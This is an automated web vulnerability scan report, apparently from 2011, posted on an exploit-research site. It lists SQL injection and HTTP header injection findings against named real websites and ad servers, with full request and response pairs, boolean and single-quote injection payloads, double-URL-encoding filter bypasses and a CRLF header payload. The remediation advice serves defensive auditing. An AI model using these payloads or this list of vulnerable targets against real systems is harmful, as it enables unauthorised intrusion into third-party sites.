DORK Search, Exploit Research, Vulnerability Reports

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://ad.doubleclick.net/adj/wiredcom.dart/threatlevel [name of an arbitrarily supplied request parameter] next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ad.doubleclick.net
Path:	/adj/wiredcom.dart/threatlevel

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 31736172%20or%201%3d1--%20 and 31736172%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adj/wiredcom.dart/threatlevel?131736172%20or%201%3d1--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c9e66a33100004f||t=1294752429|et=730|cs=d5sqmcrv; L1527=1.1294622737145; test_cookie=CheckForPermission;

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 455
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 12 Jan 2011 15:24:37 GMT
Expires: Wed, 12 Jan 2011 15:24:37 GMT
Connection: close

document.write('\n\n<a href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3a8d/3/0/%2a/b%3B232847109%3B0-0%3B0%3B16638913%3B255-0/0%3B39450345/39468132/1%3B%3B%7Eaopt%3D2/0/6c/0%3B%7Esscs%3D%3fhttp://www.concierge.com/tools/travelawards/readerschoice?mbid=house\" target=\"_blank\"><img src=\"http://s0.2mdn.net/2646754/CON_2010RC_728x90_.jpg\" WIDTH=728 HEIGHT=90 border=\"0\"></a>\n');

Request 2

GET /adj/wiredcom.dart/threatlevel?131736172%20or%201%3d2--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c9e66a33100004f||t=1294752429|et=730|cs=d5sqmcrv; L1527=1.1294622737145; test_cookie=CheckForPermission;

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 417
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 12 Jan 2011 15:24:37 GMT
Expires: Wed, 12 Jan 2011 15:24:37 GMT
Connection: close

document.write('\n\n<a href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3a8d/3/0/%2a/q%3B224881053%3B0-0%3B0%3B16638913%3B255-0/0%3B39745831/39763618/1%3B%3B%7Eaopt%3D2/0/6c/0%3B%7Esscs%3D%3fhttp://www.vf.com/app\" target=\"_blank\"><img src=\"http://s0.2mdn.net/2646749/VYF_ROS_728x90_JanApp_v3a-1.gif\" WIDTH=728 HEIGHT=90 border=\"0\"></a>\n');

1.2. http://ad.uk.doubleclick.net/adj/reg.security.4159/front [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ad.uk.doubleclick.net
Path:	/adj/reg.security.4159/front

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /adj/reg.security.4159/front%2527;tile=1;dcove=d;cta=0;ctb=0;ctc=redesign;sc=1;cid=;test=;pid=111484;pf=0;kw=open%20source;kw=encryption;kw=cryptography;kw=software;kw=export%20administration%20regulations;kw=bureau%20of%20industry%20and%20security;cp=0;vc=sec.front;pos=top;dcopt=ist;sz=728x90;ord=671761913? HTTP/1.1
Host: ad.uk.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/01/07/open_source_crypto_curbs/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 12 Jan 2011 15:26:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4540

document.write('\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.j
...[SNIP]...
mage();
ML_img_ServerOnline.src='http://invitation.opinionbar.com/popups/ServerOnline.gif';
ML_img_ServerOnline.onload=ML_ImageLoaded;
ML_img_ServerOnline.onabort=ML_ImageLoaded;
ML_img_ServerOnline.onerror=ML_ImageError;

function ML_ImageLoaded()
{
function metrixlab_onready(el, func){
   this.args = new Array(el, func);
   this.doTry = function(){
       try{
           var el = eval(this.args[0]);
           el.onload =
...[SNIP]...

Request 2

GET /adj/reg.security.4159/front%2527%2527;tile=1;dcove=d;cta=0;ctb=0;ctc=redesign;sc=1;cid=;test=;pid=111484;pf=0;kw=open%20source;kw=encryption;kw=cryptography;kw=software;kw=export%20administration%20regulations;kw=bureau%20of%20industry%20and%20security;cp=0;vc=sec.front;pos=top;dcopt=ist;sz=728x90;ord=671761913? HTTP/1.1
Host: ad.uk.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/01/07/open_source_crypto_curbs/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 12 Jan 2011 15:27:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 3471

document.write('<a target="_blank" href="http://ad.uk.doubleclick.net/click;h=v8/3a8d/0/0/%2a/d;207832120;0-0;0;13489543;3454-728/90;29868129/29886006/1;;~sscs=%3fhttp://account.theregister.co.uk/regi
...[SNIP]...

1.3. http://www.sentinelinvestments.com/forms_literature.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.sentinelinvestments.com
Path:	/forms_literature.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /forms_literature.php/1' HTTP/1.1
Host: www.sentinelinvestments.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=22150713.1294754867.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qmis707mdaq9bcgqjvjtrnmke6; __utma=22150713.441323346.1294754867.1294754867.1294754867.1; __utmc=22150713; __utmb=22150713.4.10.1294754867;

Response

HTTP/1.1 200 OK
Date: Tue, 11 Jan 2011 16:05:34 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 150
Connection: close
Content-Type: text/html; charset=UTF-8

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1

1.4. http://www.sentinelinvestments.com/index.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sentinelinvestments.com
Path:	/index.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php/1' HTTP/1.1
Host: www.sentinelinvestments.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=22150713.1294754867.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qmis707mdaq9bcgqjvjtrnmke6; __utma=22150713.441323346.1294754867.1294754867.1294754867.1; __utmc=22150713; __utmb=22150713.4.10.1294754867;

Response 1

HTTP/1.1 200 OK
Date: Tue, 11 Jan 2011 16:05:22 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 150
Connection: close
Content-Type: text/html; charset=UTF-8

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1

Request 2

GET /index.php/1'' HTTP/1.1
Host: www.sentinelinvestments.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=22150713.1294754867.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qmis707mdaq9bcgqjvjtrnmke6; __utma=22150713.441323346.1294754867.1294754867.1294754867.1; __utmc=22150713; __utmb=22150713.4.10.1294754867;

Response 2

HTTP/1.1 200 OK
Date: Tue, 11 Jan 2011 16:05:23 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head>
<l
...[SNIP]...

1.5. http://www.sentinelinvestments.com/sentinel_news_detail.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.sentinelinvestments.com
Path:	/sentinel_news_detail.php

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /sentinel_news_detail.php/1' HTTP/1.1
Host: www.sentinelinvestments.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=22150713.1294754867.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qmis707mdaq9bcgqjvjtrnmke6; __utma=22150713.441323346.1294754867.1294754867.1294754867.1; __utmc=22150713; __utmb=22150713.4.10.1294754867;

Response

HTTP/1.1 200 OK
Date: Tue, 11 Jan 2011 16:04:42 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 150
Connection: close
Content-Type: text/html; charset=UTF-8

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1

1.6. http://www.websitedescription.com/msn.whitepages.com [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.websitedescription.com
Path:	/msn.whitepages.com

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /msn.whitepages.com' HTTP/1.1
Host: www.websitedescription.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 15:27:38 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.2
Connection: close
Content-Type: text/html
Content-Length: 20123

<?php include 'include.php'; ?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<
...[SNIP]...
<br />
error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1' AND rating>
...[SNIP]...

Request 2

GET /msn.whitepages.com'' HTTP/1.1
Host: www.websitedescription.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 15:27:39 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.2
Connection: close
Content-Type: text/html
Content-Length: 29736

<?php include 'include.php'; ?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<
...[SNIP]...

1.7. http://www.websitedescription.com/msn.whitepages.com [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.websitedescription.com
Path:	/msn.whitepages.com

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /msn.whitepages.com?1'=1 HTTP/1.1
Host: www.websitedescription.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 15:27:10 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.2
Connection: close
Content-Type: text/html
Content-Length: 14020

<br />
<b>Warning</b>: Invalid argument supplied for foreach() in <b>/home/websited/public_html/libraries/Bing/BingData.php</b> on line <b>25</b><br />
<?php include 'include.php'; ?>

<!DOCTYPE html
...[SNIP]...
<br />
error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND is_approved = '1' AND rating>
...[SNIP]...

Request 2

GET /msn.whitepages.com?1''=1 HTTP/1.1
Host: www.websitedescription.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 15:27:11 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.2
Connection: close
Content-Type: text/html
Content-Length: 23460

<?php include 'include.php'; ?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<
...[SNIP]...

1.8. http://www.wired.com/user/login [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.wired.com
Path:	/user/login

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /user/login?1%2527=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response 1

HTTP/1.1 503 Service Unavailable
Server: Apache/2.0.52 (Red Hat)
Content-Length: 403
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 15:32:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 15:32:58 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>503 Service Temporarily Unavailable</title>
</head><body>
<h1>Service Temporarily Unavailable</h1>
<p>The server is temporarily u
...[SNIP]...

Request 2

GET /user/login?1%2527%2527=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.0.52 (Red Hat)
Location: https://secure.wired.com/user/login?1%2527%2527=1
Content-Length: 87
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 15:33:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 15:33:10 GMT
Connection: close
Set-Cookie: JSESSIONID=acbgrU5qBQJolc2__261s; path=/

The URL has moved <a href="https://secure.wired.com/user/login?1%2527%2527=1">here</a>

1.9. http://www.wired.com/video/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.wired.com
Path:	/video/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /video/?1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private, max-age=300
Expires: Wed, 12 Jan 2011 15:25:26 GMT
Date: Wed, 12 Jan 2011 15:20:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107791

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<a href="http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001"><img class='thumb' src="http://brightcove.condenet.com/images/1564549380/1564549380_672363149001_Honda-Corp-Featured-Video-80x60.jpg?pubId=1564549380" /></a></li>
<li class="videoTitle"><a href="http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001">Into the Unknown</a></li>
<li class="videoDesc">What drives humans to explore? Is the human brain an uncharted frontier unto itself? Join the inquisitive minds at Honda and journey into the unknown with climbers, divers, scientists, astronauts, engineers and other modern-day explorers.</li>
</ul>
</div>
</div>

</div>
<div class='bc_clear'></div>
</div>

</div>
<div id='bc_pop' class='bc_popUpContainer'>
<div id='bc_desc' class='bc_popUpInner'></div>
<div id='bc_popArrow' class='bc_popArrow'></div>
<div id='bc_popArrow_related' class='bc_popArrow_related'></div>
</div>
<script>

var nextVideoURL = "http://www.wired.com/video/latest-videos/latest/1815816633/ces-2011-rants-media-convergence-at-ces/742144985001";

...[SNIP]...

Request 2

GET /video/?1'%20and%201%3d2--%20=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private, max-age=292
Expires: Wed, 12 Jan 2011 15:25:37 GMT
Date: Wed, 12 Jan 2011 15:20:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107714

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<a href="http://www.wired.com/video/latest-videos/featured/1716500189/ibm-and-the-jeopardy-challenge/719095346001"><img class='thumb' src="http://brightcove.condenet.com/images/1564549380/1564549380_719323216001_IBM-WATSON-T.jpg?pubId=1564549380" /></a></li>
<li class="videoTitle"><a href="http://www.wired.com/video/latest-videos/featured/1716500189/ibm-and-the-jeopardy-challenge/719095346001">IBM and the Jeopardy! Challenge</a></li>
<li class="videoDesc">An IBM supercomputer named Watson will compete against Jeopardy! champions Ken Jennings and Brad Rutter this February. Watch the trailer.</li>
</ul>
</div>
</div>

</div>
<div class='bc_clear'></div>
</div>

</div>
<div id='bc_pop' class='bc_popUpContainer'>
<div id='bc_desc' class='bc_popUpInner'></div>
<div id='bc_popArrow' class='bc_popArrow'></div>
<div id='bc_popArrow_related' class='bc_popArrow_related'></div>
</div>
<script>

var nextVideoURL = "http://www.wired.com/video/latest-videos/latest/1815816633/ces-2011-rants-media-convergence-at-ces/742144985001";

var bc_gBaseURL = "http://www.wired.com/video/";
var bc_gTitl
...[SNIP]...

2. HTTP header injection previous next
There are 20 instances of this issue:

http://ad.doubleclick.net/activity [REST URL parameter 1]
http://ad.doubleclick.net/activity [name of an arbitrarily supplied request parameter]
http://ad.doubleclick.net/activity [src parameter]
http://ad.doubleclick.net/ad/wiredcom.dart/threatlevel [REST URL parameter 1]
http://ad.doubleclick.net/adj/wiredcom.dart/threatlevel [REST URL parameter 1]
http://ad.doubleclick.net/jump/wiredcom.dart/threatlevel [REST URL parameter 1]
http://ad.uk.doubleclick.net/ad/reg.misc.4159/textlink [REST URL parameter 1]
http://ad.uk.doubleclick.net/adj/reg.misc.4159/textlink [REST URL parameter 1]
http://ad.uk.doubleclick.net/adj/reg.security.4159/front [REST URL parameter 1]
http://ad.uk.doubleclick.net/imp [REST URL parameter 1]
http://ad.uk.doubleclick.net/jump/reg.misc.4159/textlink [REST URL parameter 1]
http://ad.uk.doubleclick.net/jump/reg.security.4159/front [REST URL parameter 1]
http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp [eyeblaster cookie]
http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]
http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [eyeblaster cookie]
http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [flv parameter]
http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [res parameter]
http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [wmpv parameter]
http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]
http://download.cnet.com/8737-1_1-0.xml [REST URL parameter 1]

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

2.1. http://ad.doubleclick.net/activity [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/activity

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 93020%0d%0acc1771f935d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /93020%0d%0acc1771f935d;src=1699195;type=diamo995;cat=homep280;ord=1;num=1042927896831.613? HTTP/1.1
Accept: */*
Referer: http://www.diamondconsultants.com/publicsite/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ad.doubleclick.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/93020
cc1771f935d;src=1699195;type=diamo995;cat=homep280;ord=1;num=1042927896831.613:
Date: Wed, 12 Jan 2011 03:04:36 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

